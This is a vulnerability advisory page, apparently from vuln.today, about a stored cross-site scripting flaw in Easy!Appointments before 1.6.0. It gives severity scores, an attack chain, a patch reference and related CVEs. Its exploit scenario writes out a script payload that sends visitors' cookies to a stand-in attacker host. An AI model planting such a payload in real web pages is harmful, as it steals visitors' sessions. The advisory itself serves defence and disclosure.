Skip to main content

Easy!Appointments EUVDEUVD-2026-43705

| CVE-2026-52838 LOW
Cross-site Scripting (XSS) (CWE-79)
2026-07-14 GitHub_M
2.6
CVSS 3.1 · Vendor: GitHub_M

Severity by source

Vendor (GitHub_M) PRIMARY
2.6 LOW
AV:N/AC:H/PR:H/UI:R/S:C/C:N/I:L/A:N
vuln.today AI
4.8 MEDIUM

PR:H confirmed by admin-only write access; AC:L because once payload is stored any visitor triggers it without further attacker complexity; C:L added since XSS enables content and credential exfiltration in the victim browser session.

3.1 AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N

Primary rating from Vendor (GitHub_M).

CVSS VectorVendor: GitHub_M

CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
High
Privileges Required
High
User Interaction
Required
Scope
Changed
Confidentiality
None
Integrity
Low
Availability
None

Lifecycle Timeline

3
Patch available
Jul 14, 2026 - 18:20 EUVD
Source Code Evidence Fetched
Jul 14, 2026 - 16:08 vuln.today
Analysis Generated
Jul 14, 2026 - 16:08 vuln.today

DescriptionCVE.org

Easy!Appointments is a self hosted appointment scheduler. Versions prior to 1.6.0 allow administrators to define a custom "booking disabled" message through the booking settings page. That value is stored in the disable_booking_message setting via a rich-text editor and later passed directly to the public booking_message view without escaping or sanitization. An authenticated administrator can store HTML or JavaScript in this field, enable disabled-booking mode, and trigger stored XSS in every unauthenticated visitor who opens the public booking page. Version 1.6.0 fixes the issue.

AnalysisAI

Stored XSS in Easy!Appointments versions prior to 1.6.0 allows an authenticated administrator to inject arbitrary HTML or JavaScript into the 'booking disabled' message field via the booking settings rich-text editor. The unsanitized value is rendered directly to every unauthenticated visitor who opens the public booking page while booking is disabled, crossing a scope boundary from admin context to anonymous public users. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Obtain or compromise admin credentials
Delivery
Inject JS payload into disable_booking_message rich-text field
Exploit
Enable booking-disabled mode in booking settings
Execution
Unauthenticated visitor loads public booking page
Impact
Stored XSS payload executes in visitor browser

Vulnerability AssessmentAI

Exploitation Two distinct preconditions must both be met for exploitation. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The official CVSS 3.1 base score is 2.6 (Low), driven primarily by PR:H (administrator authentication required to plant the payload), AC:H, and UI:R (the victim must visit the page). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker holding or having compromised administrator credentials navigates to the booking settings page and enters a JavaScript payload such as `<script>fetch('https://attacker.example/log?c='+document.cookie)</script>` into the rich-text 'booking disabled' message field, then enables booking-disabled mode. From that point forward, every unauthenticated visitor who loads the public booking URL silently executes the stored script, enabling cookie exfiltration, phishing overlays injected into the trusted booking domain, or silent redirection to attacker-controlled infrastructure. …
Remediation Upgrade to Easy!Appointments version 1.6.0, which resolves the issue by applying `pure_html()` sanitization both at save time within `Booking_settings.php` and at render time in the `booking_message.php` view, as confirmed by commit 629a0415f54f75556c17f4f5d9c77fda1fdbdeae (https://github.com/alextselegidis/easyappointments/commit/629a0415f54f75556c17f4f5d9c77fda1fdbdeae). … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

CVE-2024-57602 CRITICAL POC
9.8 Feb 12

An issue in Alex Tselegidis EasyAppointments v.1.5.0 allows a remote attacker to escalate privileges via the index.php f

CVE-2023-1269 CRITICAL POC
9.8 Mar 08

Use of Hard-coded Credentials in GitHub repository alextselegidis/easyappointments prior to 1.5.0. Rated critical severi

CVE-2022-0482 CRITICAL POC
9.1 Mar 09

Exposure of Private Personal Information to an Unauthorized Actor in GitHub repository alextselegidis/easyappointments p

CVE-2023-2105 HIGH POC
8.8 Apr 15

Session Fixation in GitHub repository alextselegidis/easyappointments prior to 1.5.0. Rated high severity (CVSS 8.8), th

CVE-2022-1397 HIGH POC
8.8 May 10

API Privilege Escalation in GitHub repository alextselegidis/easyappointments prior to 1.5.0. Rated high severity (CVSS

CVE-2024-57601 MEDIUM POC
6.1 Feb 12

Cross Site Scripting vulnerability in Alex Tselegidis EasyAppointments v.1.5.0 allows a remote attacker to execute arbit

CVE-2023-2104 MEDIUM POC
5.4 Apr 15

Improper Access Control in GitHub repository alextselegidis/easyappointments prior to 1.5.0. Rated medium severity (CVSS

CVE-2023-2103 MEDIUM POC
5.4 Apr 15

Cross-site Scripting (XSS) - Stored in GitHub repository alextselegidis/easyappointments prior to 1.5.0. Rated medium se

CVE-2023-2102 MEDIUM POC
4.8 Apr 15

Cross-site Scripting (XSS) - Stored in GitHub repository alextselegidis/easyappointments prior to 1.5.0. Rated medium se

CVE-2023-3700 MEDIUM POC
4.3 Jul 17

Authorization Bypass Through User-Controlled Key in GitHub repository alextselegidis/easyappointments prior to 1.5.0. Ra

CVE-2023-1367 LOW POC
3.8 Mar 13

Code Injection in GitHub repository alextselegidis/easyappointments prior to 1.5.0. Rated low severity (CVSS 3.8), this

CVE-2026-55651 HIGH
7.1 Jul 14

Broken object-level authorization in Easy!Appointments 1.5.2 lets any authenticated user query the customers search endp

Share

EUVD-2026-43705 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy